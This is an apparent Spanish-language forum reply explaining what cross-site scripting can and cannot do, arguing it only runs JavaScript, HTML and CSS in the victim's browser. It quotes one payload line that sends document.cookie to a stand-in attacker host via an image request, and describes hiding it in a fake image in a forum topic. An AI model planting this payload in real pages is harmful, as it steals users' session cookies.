Un ataque de XSS no es, digamos, de manera directa.
No esperarás a ejecutar instrucciones arbitrariamente en el navegador de ningún otro sólo con Javascript.
Un ejemplo sería algo así:
Cita: ((new Image()).src='http://hack-site.vc/trick.gif?s='+document.cookie)
La idea es que yo tomo tus cookies y las envío a mi sitio, de ahí a que pueda hacer algo con ellas es otra cosa, lo que debes entender es que lo único que se puede ejecutar es Javascript/HTML/CSS.
Pero para que funcione ni siquiera debemos estar conectados al mismo sitio ni nada, simplemente yo publico un tema, y también ahí coloco una imagen falsa que lo único que hace es lo de arriba, pero con sólo HTML.
¿Qué tipo de ataque te imaginabas posible?
Tampoco es la gran cosa.